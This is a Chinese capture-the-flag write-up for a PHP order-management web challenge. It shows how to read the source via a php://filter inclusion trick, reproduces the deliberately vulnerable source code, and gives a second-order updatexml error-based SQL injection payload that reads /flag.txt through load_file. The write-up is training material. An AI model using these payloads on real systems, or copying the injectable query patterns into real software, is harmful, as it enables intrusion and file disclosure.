# [CISCN2019 华北赛区 Day1 Web5] CyberPunk
F12 找到提示?file 找值,读文件可以采用 php 伪协议
php://filter/convert.base64-encode/resource=index.php(config.php,delete.php,search.php,confirm.php,change.php)
<?php | |
#change.php | |
require_once "config.php"; | |
if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"])) | |
{ | |
$msg = ''; | |
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i'; | |
$user_name = $_POST["user_name"]; | |
$address = addslashes($_POST["address"]); | |
$phone = $_POST["phone"]; | |
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ | |
$msg = 'no sql inject!'; | |
}else{ | |
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'"; | |
$fetch = $db->query($sql); | |
} | |
if (isset($fetch) && $fetch->num_rows>0){ | |
$row = $fetch->fetch_assoc(); | |
$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id']; | |
$result = $db->query($sql); | |
if(!$result) { | |
echo 'error'; | |
print_r($db->error); | |
exit; | |
} | |
$msg = "订单修改成功"; | |
} else { | |
$msg = "未找到订单!"; | |
} | |
}else { | |
$msg = "信息不全"; | |
} | |
?> | |
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
<title>修改收货地址</title> | |
<base href="./"> | |
<link href="assets/css/bootstrap.css" rel="stylesheet"> | |
<link href="assets/css/custom-animations.css" rel="stylesheet"> | |
<link href="assets/css/style.css" rel="stylesheet"> | |
</head> | |
<body> | |
<div id="h"> | |
<div class="container"> | |
<div class="row"> | |
<div class="col-md-8 col-md-offset-2 centered"> | |
<p style="margin:35px 0;"><br></p> | |
<h1>修改收货地址</h1> | |
<form method="post"> | |
<p> | |
<h3>姓名:</h3> | |
<input type="text" class="subscribe-input" name="user_name"> | |
<h3>电话:</h3> | |
<input type="text" class="subscribe-input" name="phone"> | |
<h3>地址:</h3> | |
<input type="text" class="subscribe-input" name="address"> | |
</p> | |
<p> | |
<button class='btn btn-lg btn-sub btn-white' type="submit">修改订单</button> | |
</p> | |
</form> | |
<?php global $msg; echo '<h2 class="mb">'.$msg.'</h2>';?> | |
</div> | |
</div> | |
</div> | |
</div> | |
<div id="f"> | |
<div class="container"> | |
<div class="row"> | |
<p style="margin:35px 0;"><br></p> | |
<h2 class="mb">订单管理</h2> | |
<a href="./index.php"> | |
<button class='btn btn-lg btn-register btn-sub btn-white'>返回</button> | |
</a> | |
<a href="./search.php"> | |
<button class="btn btn-lg btn-register btn-white" >我要查订单</button> | |
</a> | |
<a href="./delete.php"> | |
<button class="btn btn-lg btn-register btn-white" >我不想要了</button> | |
</a> | |
</div> | |
</div> | |
</div> | |
<script src="assets/js/jquery.min.js"></script> | |
<script src="assets/js/bootstrap.min.js"></script> | |
<script src="assets/js/retina-1.1.0.js"></script> | |
<script src="assets/js/jquery.unveilEffects.js"></script> | |
</body> | |
</html> |
<?php | |
#config.php | |
ini_set("open_basedir", getcwd() . ":/etc:/tmp"); | |
$DATABASE = array( | |
"host" => "127.0.0.1", | |
"username" => "root", | |
"password" => "root", | |
"dbname" =>"ctfusers" | |
); | |
$db = new mysqli($DATABASE['host'],$DATABASE['username'],$DATABASE['password'],$DATABASE['dbname']; |
<?php | |
#delete.php | |
require_once "config.php"; | |
if(!empty($_POST["user_name"]) && !empty($_POST["phone"])) | |
{ | |
$msg = ''; | |
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i'; | |
$user_name = $_POST["user_name"]; | |
$phone = $_POST["phone"]; | |
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ | |
$msg = 'no sql inject!'; | |
}else{ | |
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'"; | |
$fetch = $db->query($sql); | |
} | |
if (isset($fetch) && $fetch->num_rows>0){ | |
$row = $fetch->fetch_assoc(); | |
$result = $db->query('delete from `user` where `user_id`=' . $row["user_id"]); | |
if(!$result) { | |
echo 'error'; | |
print_r($db->error); | |
exit; | |
} | |
$msg = "订单删除成功"; | |
} else { | |
$msg = "未找到订单!"; | |
} | |
}else { | |
$msg = "信息不全"; | |
} | |
?> | |
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
<title>删除订单</title> | |
<base href="./"> | |
<meta charset="utf-8" /> | |
<link href="assets/css/bootstrap.css" rel="stylesheet"> | |
<link href="assets/css/custom-animations.css" rel="stylesheet"> | |
<link href="assets/css/style.css" rel="stylesheet"> | |
</head> | |
<body> | |
<div id="h"> | |
<div class="container"> | |
<div class="row"> | |
<div class="col-md-8 col-md-offset-2 centered"> | |
<p style="margin:35px 0;"><br></p> | |
<h1>删除订单</h1> | |
<form method="post"> | |
<p> | |
<h3>姓名:</h3> | |
<input type="text" class="subscribe-input" name="user_name"> | |
<h3>电话:</h3> | |
<input type="text" class="subscribe-input" name="phone"> | |
</p> | |
<p> | |
<button class='btn btn-lg btn-sub btn-white' type="submit">删除订单</button> | |
</p> | |
</form> | |
<?php global $msg; echo '<h2 class="mb" style="color:#ffffff;">'.$msg.'</h2>';?> | |
</div> | |
</div> | |
</div> | |
</div> | |
<div id="f"> | |
<div class="container"> | |
<div class="row"> | |
<h2 class="mb">订单管理</h2> | |
<a href="./index.php"> | |
<button class='btn btn-lg btn-register btn-sub btn-white'>返回</button> | |
</a> | |
<a href="./search.php"> | |
<button class="btn btn-lg btn-register btn-white" >我要查订单</button> | |
</a> | |
<a href="./change.php"> | |
<button class="btn btn-lg btn-register btn-white" >我要修改收货地址</button> | |
</a> | |
</div> | |
</div> | |
</div> | |
<script src="assets/js/jquery.min.js"></script> | |
<script src="assets/js/bootstrap.min.js"></script> | |
<script src="assets/js/retina-1.1.0.js"></script> | |
<script src="assets/js/jquery.unveilEffects.js"></script> | |
</body> | |
</html> |
<?php | |
#index.php | |
ini_set('open_basedir', '/var/www/html/'); | |
// $file = $_GET["file"]; | |
$file = (isset($_GET['file']) ? $_GET['file'] : null); | |
if (isset($file)){ | |
if (preg_match("/phar|zip|bzip2|zlib|data|input|%00/i",$file)) { | |
echo('no way!'); | |
exit; | |
} | |
@include($file); | |
} | |
?> | |
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta charset="utf-8"> | |
<title>index</title> | |
<base href="./"> | |
<meta charset="utf-8" /> | |
<link href="assets/css/bootstrap.css" rel="stylesheet"> | |
<link href="assets/css/custom-animations.css" rel="stylesheet"> | |
<link href="assets/css/style.css" rel="stylesheet"> | |
</head> | |
<body> | |
<div id="h"> | |
<div class="container"> | |
<h2>2077发售了,不来份实体典藏版吗?</h2> | |
<img class="logo" src="./assets/img/logo-en.png"><!--LOGOLOGOLOGOLOGO--> | |
<div class="row"> | |
<div class="col-md-8 col-md-offset-2 centered"> | |
<h3>提交订单</h3> | |
<form role="form" action="./confirm.php" method="post" enctype="application/x-www-urlencoded"> | |
<p> | |
<h3>姓名:</h3> | |
<input type="text" class="subscribe-input" name="user_name"> | |
<h3>电话:</h3> | |
<input type="text" class="subscribe-input" name="phone"> | |
<h3>地址:</h3> | |
<input type="text" class="subscribe-input" name="address"> | |
</p> | |
<button class='btn btn-lg btn-sub btn-white' type="submit">我正是送钱之人</button> | |
</form> | |
</div> | |
</div> | |
</div> | |
</div> | |
<div id="f"> | |
<div class="container"> | |
<div class="row"> | |
<h2 class="mb">订单管理</h2> | |
<a href="./search.php"> | |
<button class="btn btn-lg btn-register btn-white" >我要查订单</button> | |
</a> | |
<a href="./change.php"> | |
<button class="btn btn-lg btn-register btn-white" >我要修改收货地址</button> | |
</a> | |
<a href="./delete.php"> | |
<button class="btn btn-lg btn-register btn-white" >我不想要了</button> | |
</a> | |
</div> | |
</div> | |
</div> | |
<script src="assets/js/jquery.min.js"></script> | |
<script src="assets/js/bootstrap.min.js"></script> | |
<script src="assets/js/retina-1.1.0.js"></script> | |
<script src="assets/js/jquery.unveilEffects.js"></script> | |
</body> | |
</html> | |
<!--?file=?--> |
<?php | |
#search.php | |
require_once "config.php"; | |
if(!empty($_POST["user_name"]) && !empty($_POST["phone"])) | |
{ | |
$msg = ''; | |
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i'; | |
$user_name = $_POST["user_name"]; | |
$phone = $_POST["phone"]; | |
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ | |
$msg = 'no sql inject!'; | |
}else{ | |
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'"; | |
$fetch = $db->query($sql); | |
} | |
if (isset($fetch) && $fetch->num_rows>0){ | |
$row = $fetch->fetch_assoc(); | |
if(!$row) { | |
echo 'error'; | |
print_r($db->error); | |
exit; | |
} | |
$msg = "<p>姓名:".$row['user_name']."</p><p>, 电话:".$row['phone']."</p><p>, 地址:".$row['address']."</p>"; | |
} else { | |
$msg = "未找到订单!"; | |
} | |
}else { | |
$msg = "信息不全"; | |
} | |
?> | |
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
<title>搜索</title> | |
<base href="./"> | |
<link href="assets/css/bootstrap.css" rel="stylesheet"> | |
<link href="assets/css/custom-animations.css" rel="stylesheet"> | |
<link href="assets/css/style.css" rel="stylesheet"> | |
</head> | |
<body> | |
<div id="h"> | |
<div class="container"> | |
<div class="row"> | |
<div class="col-md-8 col-md-offset-2 centered"> | |
<p style="margin:35px 0;"><br></p> | |
<h1>订单查询</h1> | |
<form method="post"> | |
<p> | |
<h3>姓名:</h3> | |
<input type="text" class="subscribe-input" name="user_name"> | |
<h3>电话:</h3> | |
<input type="text" class="subscribe-input" name="phone"> | |
</p> | |
<p> | |
<button class='btn btn-lg btn-sub btn-white' type="submit">查询订单</button> | |
</p> | |
</form> | |
<?php global $msg; echo '<h2 class="mb">'.$msg.'</h2>';?> | |
</div> | |
</div> | |
</div> | |
</div> | |
<div id="f"> | |
<div class="container"> | |
<div class="row"> | |
<p style="margin:35px 0;"><br></p> | |
<h2 class="mb">订单管理</h2> | |
<a href="./index.php"> | |
<button class='btn btn-lg btn-register btn-sub btn-white'>返回</button> | |
</a> | |
<a href="./change.php"> | |
<button class="btn btn-lg btn-register btn-white" >我要修改收货地址</button> | |
</a> | |
<a href="./delete.php"> | |
<button class="btn btn-lg btn-register btn-white" >我不想要了</button> | |
</a> | |
</div> | |
</div> | |
</div> | |
<script src="assets/js/jquery.min.js"></script> | |
<script src="assets/js/bootstrap.min.js"></script> | |
<script src="assets/js/retina-1.1.0.js"></script> | |
<script src="assets/js/jquery.unveilEffects.js"></script> | |
</body> | |
</html> |
<?php | |
#confirm.php | |
require_once "config.php"; | |
//var_dump($_POST); | |
if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"])) | |
{ | |
$msg = ''; | |
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i'; | |
$user_name = $_POST["user_name"]; | |
$address = $_POST["address"]; | |
$phone = $_POST["phone"]; | |
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ | |
$msg = 'no sql inject!'; | |
}else{ | |
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'"; | |
$fetch = $db->query($sql); | |
} | |
if($fetch->num_rows>0) { | |
$msg = $user_name."已提交订单"; | |
}else{ | |
$sql = "insert into `user` ( `user_name`, `address`, `phone`) values( ?, ?, ?)"; | |
$re = $db->prepare($sql); | |
$re->bind_param("sss", $user_name, $address, $phone); | |
$re = $re->execute(); | |
if(!$re) { | |
echo 'error'; | |
print_r($db->error); | |
exit; | |
} | |
$msg = "订单提交成功"; | |
} | |
} else { | |
$msg = "信息不全"; | |
} | |
?> | |
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta charset="utf-8"> | |
<title>确认订单</title> | |
<base href="./"> | |
<meta charset="utf-8"/> | |
<link href="assets/css/bootstrap.css" rel="stylesheet"> | |
<link href="assets/css/custom-animations.css" rel="stylesheet"> | |
<link href="assets/css/style.css" rel="stylesheet"> | |
</head> | |
<body> | |
<div id="h"> | |
<div class="container"> | |
<img class="logo" src="./assets/img/logo-zh.png"> | |
<div class="row"> | |
<div class="col-md-8 col-md-offset-2 centered"> | |
<?php global $msg; echo '<h2 class="mb">'.$msg.'</h2>';?> | |
<a href="./index.php"> | |
<button class='btn btn-lg btn-sub btn-white'>返回</button> | |
</a> | |
</div> | |
</div> | |
</div> | |
</div> | |
<div id="f"> | |
<div class="container"> | |
<div class="row"> | |
<p style="margin:35px 0;"><br></p> | |
<h2 class="mb">订单管理</h2> | |
<a href="./search.php"> | |
<button class="btn btn-lg btn-register btn-white" >我要查订单</button> | |
</a> | |
<a href="./change.php"> | |
<button class="btn btn-lg btn-register btn-white" >我要修改收货地址</button> | |
</a> | |
<a href="./delete.php"> | |
<button class="btn btn-lg btn-register btn-white" >我不想要了</button> | |
</a> | |
</div> | |
</div> | |
</div> | |
<script src="assets/js/jquery.min.js"></script> | |
<script src="assets/js/bootstrap.min.js"></script> | |
<script src="assets/js/retina-1.1.0.js"></script> | |
<script src="assets/js/jquery.unveilEffects.js"></script> | |
</body> | |
</html> |
观察可以发现数据写入采用预编译无法利用;数据修改时 user_name 和 phone 字段进行了过滤,基本妹有利用价值,而 address 字段妹有进行过滤,但是进行了转义无法直接注入。address 用了一个 addslashes 函数()
SQL 语句:
$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
使用 updataxml 报错注入,updataxml 函数对字符串长度有限制,所以分段进行读取
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,30)),0x7e),1)#
首先提交订单时将可用的 sql 语句提交
在进行修改:
然后就会报错,获取一部分 flag:
在讲 payload 的 substr 从 0 开始改成 20 开始:
拼接获取 flag
